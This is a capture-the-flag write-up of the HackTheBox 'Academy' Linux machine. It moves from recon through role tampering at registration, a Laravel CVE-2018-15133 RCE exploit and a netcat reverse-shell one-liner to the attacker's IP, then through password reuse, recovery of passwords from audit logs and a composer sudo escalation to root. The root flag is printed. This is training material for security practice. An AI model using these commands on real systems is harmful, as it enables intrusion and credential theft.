Academy
#Linux #Enumeration #Laravel #UserPivoting
Academy is an easy-rated Linux machine from HackTheBox, created by egre55 and mrb3n. In the current post, my IP is 10.10.14.44, and the target IP is 10.129.167.56
This machine features an apache server hosting a PHP website. The website doesn't look special until you intercept the registration process, where you can change a obvious parameter to change your privileges to that account, then when you fuzz the website, you find an admin login url. In that URL there is an sub-domain with error logs from Laravel, revealing in the process the API_KEY used for an exploit for RCE. Inside the machine, there are a lot of techniques used to pivot between users and the change your user to root.
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
$ ping -c 1 10.129.167.56
Pinging 10.129.167.56 with 32 bytes of data:
Reply from 10.129.167.56: bytes=32 time=141ms TTL=63
Reply from 10.129.167.56: bytes=32 time=173ms TTL=63
Reply from 10.129.167.56: bytes=32 time=142ms TTL=63
Reply from 10.129.167.56: bytes=32 time=144ms TTL=63
Ping statistics for 10.129.167.56:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 141ms, Maximum = 173ms, Average = 150msBy the TTL, we can assume that is a Linux Machine.
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.167.56 -oN Ports
Nmap scan report for 10.129.167.56
Host is up, received reset ttl 63 (0.16s latency).
Scanned at 2023-06-06 10:37:16 Pacific SA Standard Time for 16s
Not shown: 65283 closed tcp ports (reset), 249 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
33060/tcp open mysqlx syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
Raw packets sent: 76803 (3.379MB) | Rcvd: 74737 (2.990MB)$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target
Nmap scan report for 10.129.167.56
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=6/6%Time=647F44D8%P=i686-pc-windows-windows%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.95 secondsIf you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version.
Information that we have now: It's a website (port 80) that use Apache/2.4.41, with an open mysqlx (port 33060), there is no response for now.
Because of the following message "Did not follow redirect to http://academy.htb/" we have to add the IP to /etc/hosts/
$ whatweb http://academy.htb
http://academy.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.167.56],
Title[Hack The Box Academy]Browser: http://academy.htb/
If you go to Login, the URL is "http://academy.htb/login.php", this is a good opportunity to fuzz with php termination.
wfuzz -c -f PHPfuzz -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://academy.htb/FUZZ.php********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://academy.htb/FUZZ.php
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 76 L 131 W 2117 Ch "index"
000000039: 200 141 L 226 W 2627 Ch "login"
000000245: 200 141 L 227 W 2633 Ch "admin"
000000024: 302 1049 L 4114 W 55034 Ch "home"
000000051: 200 148 L 247 W 3003 Ch "register"
000001476: 200 0 L 0 W 0 Ch "config"
000045226: 403 9 L 28 W 276 Ch "http://academy.htb/.php"Index.php: Nothing
login.php: useful after registration.
admin.php: Admin login panel, it could be useful.
home.php: Redirect to login.php
register.php: Registration form.
config.php: 403, Empty
Our alternatives now is to intercept the registration panel with burpsuite.
Exploitation
At the response, we can see that between the parameters, there is a "roleid", before we found an admin.php.
So, our best action is to change the roleid to 1 and create a new account.
Then, go to http://academy.htb/admin.php and login with the new user... after this, you will see the following thing:
Hey! There is a subdomain, add it to /etc/hosts.
Reverse Shell [www-data]
The website shows a Laravel error, maybe it could be vulnerable to something, search it at exploit-db.com. I tried the CVE-2021-3129 but it doesn't work. And the CVE-2018-15133 requieres metasploit, but there are alternatives at github.
git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133The structure of the command is the following:
pwn_laravel.py [-h] [-c COMMAND] [-m {1,2,3,4}] [-i] URL API_KEY
python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactiveNow, open a new local terminal
nc -nlvp 443rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 443 >/tmp/fAnd you are in! Close the CVE Interactive Terminal and do a Bash Upgrade at the other terminal
User Pivoting [cry0l1t3]
www-data@academy:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@academy:/var/www/html$ ls -la
total 20
drwxr-xr-x 4 root root 4096 Aug 13 2020 .
drwxr-xr-x 3 root root 4096 Aug 7 2020 ..
drwxr-xr-x 12 www-data www-data 4096 Aug 13 2020 academy
drwxr-xr-x 12 root root 4096 Aug 13 2020 htb-academy-dev-01
-rw-r--r-- 1 www-data www-data 50 Aug 9 2020 index.php
# We are at -dev-, is a good idea to check the current working files at academy
www-data@academy:/var/www/html$ cd academy/
www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data 4096 Aug 13 2020 .
drwxr-xr-x 4 root root 4096 Aug 13 2020 ..
-rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env
-rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example
-rw-r--r-- 1 www-data www-data 111 Feb 7 2018 .gitattributes
-rw-r--r-- 1 www-data www-data 155 Feb 7 2018 .gitignore
drwxr-xr-x 6 www-data www-data 4096 Feb 7 2018 app
-rwxr-xr-x 1 www-data www-data 1686 Feb 7 2018 artisan
<...>There is an interesting hidden file called .env, type cat .env
AAPP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!! #Password!
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"Now we can test that password with other users, we can enumerate them at /home
www-data@academy:/home$ ls -l
total 32
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3nAfter testing with each { $user : mySup3rP4s5w0rd!! } the correct one is cry0l1t3
$ su cry0l1t3
$ cat /home/cry0l1t3/user.txtUser Pivoting [mrb3n]
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)The user is from the group adm, maybe we can use an specific command or read some logs.
$ cd /
$ find \-group adm 2>/dev/null
<...>
./var/log/apt/term.log.3.gz
./var/log/apt/term.log.1.gz
./var/log/apt/term.log.4.gz
./var/log/apt/term.log
./var/log/audit
./var/log/audit/audit.log.2
./var/log/audit/audit.log
./var/log/audit/audit.log.3
./var/log/audit/audit.log.1
./var/log/syslog.4.gz
./var/log/syslog.7.gz
./var/log/auth.log.2.gz
./var/log/auth.log.1
./var/log/syslog.3.gz
<...>Usually the logs located at /var/log/audit/ are important, but they have a LOT of information, a good alternative is to use "grep" to find relevant data.
$ cd /var/log/audit/
# Remember that our current uid is 1002, so we need another one.
$ grep -r "uid=1001" | grep "cmd"
audit.log:type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success'
<...>
# From here, we want:
# 2F7573722F62696E2F656469746F72202D2D202F
# Between "cmd=" and "terminal=From here, we want a hash like "2F7573722F62696E2F656469746F72202D2D202F" between cmd= and Terminal=, to apply xxd -ps -r
grep -r "uid=1001" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -rNothing here, now we will tesst with uid=1000
grep -r "uid=1000" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -rBut there is another interesting rows, the ones that contain "TYPE=tty" and "data="
grep -r tty | grep -oP '(?<=data=).*' | sort -u | xxd -ps -r ; echoexithistory
mrb3n_Ac@d3my!
su mrb3n
whoami
cat dat
<...>su mrb3n # Password: mrb3n_Ac@d3my!Privileges Escalation
$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composerAt GTFOBin there is a way to escalate privileges with sudo using composer
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x$ whoami
root
$ cat /root/root.txt
e13da1f49d8d784bffa5504154a3d8f8Last updated